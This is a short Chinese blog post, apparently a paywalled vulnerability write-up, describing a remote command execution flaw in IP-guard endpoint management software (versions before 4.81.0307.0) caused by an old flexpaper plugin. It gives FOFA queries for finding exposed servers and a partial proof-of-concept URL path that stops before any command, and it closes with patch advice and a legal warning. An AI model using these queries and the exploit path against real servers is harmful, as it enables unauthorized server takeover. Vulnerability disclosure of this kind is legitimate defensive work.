本文介绍了IP-guard终端安全管理软件的一个命令执行漏洞,该漏洞源于旧版本中flexpaper插件的使用。攻击者可利用此漏洞执行任意命令,获取服务器控制权限。受影响版本为IP-guard<4.81.0307.0。修复建议包括升级到最新版本或采取临时缓解措施,如配置IDS/IPS/WAF。文章强调未授权攻击的非法性,并提醒读者注意法律责任。
简介
IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
影响版本:IP-guard<4.81.0307.0
漏洞复现
FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"
访问页面如下所示:
POC:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
